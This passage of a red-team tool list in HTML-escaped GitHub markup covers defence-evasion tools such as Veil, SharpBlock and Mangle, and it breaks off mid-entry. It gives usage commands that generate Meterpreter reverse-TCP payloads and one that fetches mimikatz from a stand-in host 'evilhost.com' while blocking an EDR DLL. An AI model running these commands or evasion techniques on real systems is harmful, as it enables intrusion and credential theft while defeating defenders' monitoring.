src=\"https://private-user-images.githubusercontent.com/100603074/238469103-4c84ffeb-1ffb-474a-b028-4c8fcc64deb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY5MTAzLTRjODRmZmViLTFmZmItNDc0YS1iMDI4LTRjOGZjYzY0ZGViNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xNjg5NzFlZTQ3ZTMwYWVkMGNhMDc3NTJkMzhhZjk0ODgyYzRhZjlkNDlmOWNjYjMyOTE2MjczNWM0YjA3YTc5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9IdQ4ZIl9Z0B2U5z4hH5EwnKIbIG5d8vhTskYY_KgJ4\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/AlessandroZ/BeRoot\"\u003ehttps://github.com/AlessandroZ/BeRoot\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eDefense Evasion\u003c/h1\u003e\u003ca id=\"user-content-defense-evasion\" class=\"anchor\" aria-label=\"Permalink: Defense Evasion\" href=\"#defense-evasion\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/danielbohannon/Invoke-Obfuscation\"\u003eInvoke-Obfuscation\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-invoke-obfuscation\" class=\"anchor\" aria-label=\"Permalink: 🔙Invoke-Obfuscation\" href=\"#invoke-obfuscation\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/danielbohannon/Invoke-Obfuscation.git\"\u003e\u003cpre\u003egit clone https://github.com/danielbohannon/Invoke-Obfuscation.git\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./Invoke-Obfuscation\"\u003e\u003cpre\u003e./Invoke-Obfuscation\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Veil-Framework/Veil\"\u003eVeil\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-veil\" class=\"anchor\" aria-label=\"Permalink: 🔙Veil\" href=\"#veil\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eVeil is a tool for generating metasploit payloads that bypass common anti-virus solutions.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be used to generate obfuscated shellcode, see the official \u003ca href=\"https://www.veil-framework.com/\" rel=\"nofollow\"\u003eveil framework blog\u003c/a\u003e for more info.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Kali)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"apt -y install veil\n/usr/share/veil/config/setup.sh --force --silent\"\u003e\u003cpre\u003eapt -y install veil\n/usr/share/veil/config/setup.sh --force --silent\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt-get -y install git\ngit clone https://github.com/Veil-Framework/Veil.git\ncd Veil/\n./config/setup.sh --force --silent\"\u003e\u003cpre\u003esudo apt-get -y install git\ngit clone https://github.com/Veil-Framework/Veil.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Veil/\n./config/setup.sh --force --silent\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)\n./Veil.py -t Ordnance --list-payloads\n\n# List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)\n./Veil.py -t Ordnance --list-encoders\n\n# Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234\n./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234\n\n# List all payloads (–list-payloads) for the tool Evasion (-t Evasion)\n./Veil.py -t Evasion --list-payloads\n\n# Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris\n./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)\u003c/span\u003e\n./Veil.py -t Ordnance --list-payloads\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)\u003c/span\u003e\n./Veil.py -t Ordnance --list-encoders\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234\u003c/span\u003e\n./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List all payloads (–list-payloads) for the tool Evasion (-t Evasion)\u003c/span\u003e\n./Veil.py -t Evasion --list-payloads\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris\u003c/span\u003e\n./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eVeil creators wrote a nice \u003ca href=\"https://www.veil-framework.com/veil-command-line-usage/\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e explaining further ordnance and evasion command line usage.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/CCob/SharpBlock\"\u003eSharpBlock\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sharpblock\" class=\"anchor\" aria-label=\"Permalink: 🔙SharpBlock\" href=\"#sharpblock\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA method of bypassing EDR's active projection DLL's by preventing entry point execution.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eFeatures:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eBlocks EDR DLL entry point execution, which prevents EDR hooks from being placed.\u003c/li\u003e\n\u003cli\u003ePatchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.\u003c/li\u003e\n\u003cli\u003eHost process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).\u003c/li\u003e\n\u003cli\u003eImplanted process is hidden to help evade scanners looking for hollowed processes.\u003c/li\u003e\n\u003cli\u003eCommand line args are spoofed and implanted after process creation using stealthy EDR detection method.\u003c/li\u003e\n\u003cli\u003ePatchless ETW bypass.\u003c/li\u003e\n\u003cli\u003eBlocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUse \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e to compile the SharpBlock binary.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen the SharpBlock \u003ca href=\"https://github.com/CCob/SharpBlock\"\u003eproject .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL\nSharpBlock -e http://evilhost.com/mimikatz.bin -s c:\\windows\\system32\\notepad.exe -d \u0026quot;Active Protection DLL for SylantStrike\u0026quot; -a coffee\n\n# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL\nexecute-assembly SharpBlock.exe -e \\\\.\\pipe\\mimi -s c:\\windows\\system32\\notepad.exe -d \u0026quot;Active Protection DLL for SylantStrike\u0026quot; -a coffee\nupload_file /home/haxor/mimikatz.exe \\\\.\\pipe\\mimi\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL\u003c/span\u003e\nSharpBlock -e http://evilhost.com/mimikatz.bin -s c:\u003cspan class=\"pl-cce\"\u003e\\w\u003c/span\u003eindows\u003cspan class=\"pl-cce\"\u003e\\s\u003c/span\u003eystem32\u003cspan class=\"pl-cce\"\u003e\\n\u003c/span\u003eotepad.exe -d \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eActive Protection DLL for SylantStrike\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -a coffee\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL\u003c/span\u003e\nexecute-assembly SharpBlock.exe -e \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\p\u003c/span\u003eipe\u003cspan class=\"pl-cce\"\u003e\\m\u003c/span\u003eimi -s c:\u003cspan class=\"pl-cce\"\u003e\\w\u003c/span\u003eindows\u003cspan class=\"pl-cce\"\u003e\\s\u003c/span\u003eystem32\u003cspan class=\"pl-cce\"\u003e\\n\u003c/span\u003eotepad.exe -d \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eActive Protection DLL for SylantStrike\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -a coffee\nupload_file /home/haxor/mimikatz.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\p\u003c/span\u003eipe\u003cspan class=\"pl-cce\"\u003e\\m\u003c/span\u003eimi\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice PenTestPartners blog post \u003ca href=\"https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://youtu.be/0W9wkamknfM\" rel=\"nofollow\"\u003ehttps://youtu.be/0W9wkamknfM\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/weak1337/Alcatraz\"\u003eAlcatraz\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-alcatraz\" class=\"anchor\" aria-label=\"Permalink: 🔙Alcatraz\" href=\"#alcatraz\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAlcatraz is a GUI x64 binary obfuscator that is able to obfuscate various different pe files including:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e.exe\u003c/li\u003e\n\u003cli\u003e.dll\u003c/li\u003e\n\u003cli\u003e.sys\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003eSome supported obfuscation features include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eObfuscation of immediate moves\u003c/li\u003e\n\u003cli\u003eControl flow flattening\u003c/li\u003e\n\u003cli\u003eADD mutation\u003c/li\u003e\n\u003cli\u003eEntry-point obfuscation\u003c/li\u003e\n\u003cli\u003eLea obfuscation\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Requirements)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eInstall: \u003ca href=\"https://vcpkg.io/en/getting-started.html\" rel=\"nofollow\"\u003ehttps://vcpkg.io/en/getting-started.html\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"vcpkg.exe install asmjit:x64-windows\nvcpkg.exe install zydis:x64-windows\"\u003e\u003cpre\u003evcpkg.exe install asmjit:x64-windows\nvcpkg.exe install zydis:x64-windows\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUsing the GUI to obfuscate a binary:\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eLoad a binary by clicking \u003ccode\u003efile\u003c/code\u003e in the top left corner.\u003c/li\u003e\n\u003cli\u003eAdd functions by expanding the \u003ccode\u003eFunctions\u003c/code\u003e tree. (You can search by putting in the name in the searchbar at the top)\u003c/li\u003e\n\u003cli\u003eHit \u003ccode\u003ecompile\u003c/code\u003e (\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eObfuscating lots of functions might take some seconds\u003c/em\u003e)\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/weak1337/Alcatraz\"\u003ehttps://github.com/weak1337/Alcatraz\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/optiv/Mangle\"\u003eMangle\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-mangle\" class=\"anchor\" aria-label=\"Permalink: 🔙Mangle\" href=\"#mangle\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMangle is a tool that manipulates aspects of compiled executables (.exe or DLL).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIn doing so, Mangle helps loaders evade on-disk and in-memory scanners.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"go get github.com/Binject/debug/pe\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003ego get github.com/Binject/debug/pe\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThen build it\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/optiv/Mangle\ncd Mangle\ngo build Mangle.go\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/optiv/Mangle\ncd Mangle\ngo build Mangle.go\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\" -C string\n Path to the file containing the certificate you want to clone\n -I string\n Path to the orginal file\n -M Edit the PE file to strip out Go indicators\n -O string\n The new file name\n -S int\n How many MBs to increase the file by\"\u003e\u003cpre\u003e -C string\n Path to the file containing the certificate you want to clone\n -I string\n Path to the orginal file\n -M Edit the PE file to strip out Go indicators\n -O string\n The new file name\n -S int\n How many MBs to increase the file by\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/optiv/Mangle#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/optiv/Mangle\"\u003ehttps://github.com/optiv/Mangle\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"http://amsi.fail/\" rel=\"nofollow\"\u003eAMSI Fail\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-amsi-fail\" class=\"anchor\" aria-label=\"Permalink: 🔙AMSI Fail\" href=\"#amsi-fail\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at 